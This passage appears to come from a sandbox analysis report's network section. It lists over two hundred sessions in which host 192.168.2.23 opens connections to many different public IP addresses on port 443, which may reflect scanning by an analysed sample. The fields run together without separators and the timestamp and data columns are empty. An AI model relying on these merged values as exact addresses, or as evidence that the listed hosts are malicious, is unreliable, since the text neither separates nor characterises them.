                                            14798192.168.2.2342796158.32.8.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14799192.168.2.2335406123.141.31.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14800192.168.2.233387281.102.3.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14801192.168.2.2349916164.87.70.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14802192.168.2.234492220.193.91.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14803192.168.2.2343622180.6.64.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14804192.168.2.234419458.230.18.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14805192.168.2.2339256213.74.223.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14806192.168.2.2336088100.62.219.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14807192.168.2.235356441.195.205.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14808192.168.2.234788851.12.228.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14809192.168.2.235822475.167.149.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14810192.168.2.235930627.81.146.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14811192.168.2.2350296163.211.116.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14812192.168.2.235694857.236.136.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14813192.168.2.235004417.221.111.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14814192.168.2.2338980112.26.58.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14815192.168.2.233995818.229.122.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14816192.168.2.234658086.137.154.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14817192.168.2.235491641.192.43.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14818192.168.2.2337074108.134.251.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14819192.168.2.235498037.186.52.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14820192.168.2.2337146197.235.140.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14821192.168.2.2352990157.84.221.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14822192.168.2.233455667.14.30.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14823192.168.2.2353948109.5.69.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14824192.168.2.2335422201.62.247.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14825192.168.2.2348720165.161.246.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14826192.168.2.2335972140.129.151.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14827192.168.2.2343774222.237.200.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14828192.168.2.2344528190.156.239.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14829192.168.2.235645886.191.17.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14830192.168.2.2355252171.214.199.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14831192.168.2.235935680.49.75.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14832192.168.2.2348912103.31.85.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14833192.168.2.235898065.214.230.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14834192.168.2.2347580157.99.50.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14835192.168.2.2337128173.38.191.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14836192.168.2.234811458.8.167.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14837192.168.2.2336716131.143.146.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14838192.168.2.2354220212.208.228.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14839192.168.2.233873670.168.46.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14840192.168.2.2336090211.36.246.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14841192.168.2.2350932135.192.185.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14842192.168.2.2356594159.151.206.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14843192.168.2.234106476.142.65.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14844192.168.2.2345830196.0.30.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14845192.168.2.233393434.168.125.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14846192.168.2.235229278.43.55.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14847192.168.2.2353630120.14.103.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14848192.168.2.233559852.251.223.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14849192.168.2.23448202.28.161.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14850192.168.2.2346332199.168.26.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14851192.168.2.2352038132.41.27.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14852192.168.2.2352868146.212.109.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14853192.168.2.235311070.254.49.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14854192.168.2.2339412146.163.205.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14855192.168.2.233806452.76.116.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14856192.168.2.2345084120.28.234.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14857192.168.2.235120254.41.241.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14858192.168.2.234716288.105.74.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14859192.168.2.233902076.81.50.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14860192.168.2.235913074.21.27.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14861192.168.2.2351252121.26.195.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14862192.168.2.235283874.248.226.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14863192.168.2.23463168.200.156.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14864192.168.2.2356370131.223.168.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14865192.168.2.234515432.122.101.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14866192.168.2.234237643.190.168.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14867192.168.2.235836435.104.108.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14868192.168.2.233456223.162.211.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14869192.168.2.2343950123.212.67.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14870192.168.2.234020263.193.153.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14871192.168.2.2338840129.217.49.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14872192.168.2.236031693.208.117.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14873192.168.2.2337768191.216.222.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14874192.168.2.2352546164.17.182.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14875192.168.2.2350870149.108.119.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14876192.168.2.233537877.141.234.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14877192.168.2.234464264.155.109.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14878192.168.2.235781417.219.104.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14879192.168.2.235637090.1.142.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14880192.168.2.2356122122.183.176.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14881192.168.2.2357888140.148.110.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14882192.168.2.236054495.232.248.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14883192.168.2.2340810199.104.9.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14884192.168.2.23538869.108.191.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14885192.168.2.2341930146.147.223.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14886192.168.2.235648840.18.67.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14887192.168.2.2342430205.223.121.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14888192.168.2.23370781.11.87.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14889192.168.2.235818845.211.191.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14890192.168.2.233799023.30.100.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14891192.168.2.2354760207.248.114.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14892192.168.2.2346172217.71.199.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14893192.168.2.234162878.137.212.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14894192.168.2.2356898103.115.254.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14895192.168.2.2355792153.58.225.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14896192.168.2.2349074181.123.173.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14897192.168.2.2344014145.91.223.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14898192.168.2.2343680199.163.78.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14899192.168.2.2356676133.224.8.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14900192.168.2.235707265.146.90.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14901192.168.2.234503682.214.211.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14902192.168.2.2360152160.5.111.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14903192.168.2.2353170120.60.67.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14904192.168.2.2353956145.132.122.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14905192.168.2.234611235.199.133.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14906192.168.2.2348076221.61.79.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14907192.168.2.235710436.65.84.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14908192.168.2.235286034.90.150.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14909192.168.2.235946490.125.44.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14910192.168.2.2358146211.103.11.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14911192.168.2.235892248.201.15.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14912192.168.2.233306650.251.130.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14913192.168.2.2357634218.17.209.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14914192.168.2.235572660.196.175.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14915192.168.2.2336096160.72.187.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14916192.168.2.235649836.112.219.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14917192.168.2.235990888.223.177.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14918192.168.2.233376025.46.52.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14919192.168.2.2333346107.30.210.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14920192.168.2.234904074.225.204.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14921192.168.2.2340114167.137.102.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14922192.168.2.234569038.102.71.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14923192.168.2.2357350210.44.134.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14924192.168.2.2336204142.247.44.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14925192.168.2.2357404114.6.238.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14926192.168.2.234102252.116.13.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14927192.168.2.235693475.99.2.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14928192.168.2.233655659.182.173.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14929192.168.2.2347642104.15.26.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14930192.168.2.2355266180.78.9.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14931192.168.2.2353480208.0.118.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14932192.168.2.234526013.14.221.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14933192.168.2.2356148179.215.138.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14934192.168.2.2340084218.247.176.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14935192.168.2.2355772204.158.235.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14936192.168.2.2359632157.146.139.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14937192.168.2.2337146165.49.139.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14938192.168.2.2358394131.36.140.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14939192.168.2.2346338209.227.190.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14940192.168.2.2353344205.156.162.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14941192.168.2.2333986121.232.42.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14942192.168.2.2358330148.34.90.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14943192.168.2.234999899.210.189.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14944192.168.2.235616491.68.133.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14945192.168.2.2339752198.42.224.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14946192.168.2.2346202168.205.6.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14947192.168.2.235364838.150.32.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14948192.168.2.2359416184.8.205.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14949192.168.2.234201263.101.55.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14950192.168.2.2337422100.42.149.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14951192.168.2.2359348181.131.101.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14952192.168.2.233616218.136.21.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14953192.168.2.2351230154.217.89.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14954192.168.2.234605843.29.111.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14955192.168.2.2359088203.231.76.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14956192.168.2.2340976142.21.32.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14957192.168.2.2335764186.183.217.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14958192.168.2.233434253.112.199.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14959192.168.2.233586466.199.93.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14960192.168.2.2349584161.83.119.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14961192.168.2.234637063.130.243.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14962192.168.2.2359184140.59.16.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14963192.168.2.235568495.126.32.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14964192.168.2.2336834136.103.246.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14965192.168.2.234469619.103.216.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14966192.168.2.235271214.185.217.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14967192.168.2.234853674.146.237.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14968192.168.2.234379473.86.131.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14969192.168.2.2347090185.225.174.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14970192.168.2.2346386125.181.118.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14971192.168.2.23507344.132.36.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14972192.168.2.233577297.221.36.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14973192.168.2.2349670154.195.139.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14974192.168.2.2356128142.16.125.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14975192.168.2.2350474204.35.108.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14976192.168.2.234995058.148.203.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14977192.168.2.2347250203.188.0.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14978192.168.2.2348918197.155.2.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14979192.168.2.2348280136.227.111.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14980192.168.2.2337538196.138.179.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14981192.168.2.23429505.206.166.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14982192.168.2.2359424157.128.31.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14983192.168.2.234301253.223.250.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14984192.168.2.2360588140.152.98.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14985192.168.2.2339338171.219.60.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14986192.168.2.2337488126.243.165.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14987192.168.2.235403450.63.73.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14988192.168.2.2341424148.154.183.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14989192.168.2.234954696.105.81.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14990192.168.2.2352588205.119.17.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14991192.168.2.235830690.99.125.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14992192.168.2.2351940143.186.228.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14993192.168.2.235043878.126.89.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14994192.168.2.2349336202.176.23.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14995192.168.2.233336419.65.167.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14996192.168.2.2354856153.228.43.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14997192.168.2.235555688.134.190.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14998192.168.2.2342072126.173.6.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14999192.168.2.2342482114.49.121.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15000192.168.2.233411019.170.255.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15001192.168.2.2360076174.136.223.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15002192.168.2.2351020167.64.226.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15003192.168.2.233437819.195.141.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15004192.168.2.234685261.57.167.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15005192.168.2.2337018207.84.79.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15006192.168.2.2339412113.110.10.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15007192.168.2.235304640.202.39.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15008192.168.2.2359246179.95.47.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15009192.168.2.2357962177.12.179.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15010192.168.2.2343128101.240.57.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15011192.168.2.234167031.20.253.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15012192.168.2.2338004137.129.94.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15013192.168.2.2348410160.153.40.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15014192.168.2.234848484.79.9.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15015192.168.2.2352942144.136.133.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15016192.168.2.23438449.73.92.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15017192.168.2.2349580130.52.255.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15018192.168.2.2332884179.237.186.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15019192.168.2.2357886105.65.158.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
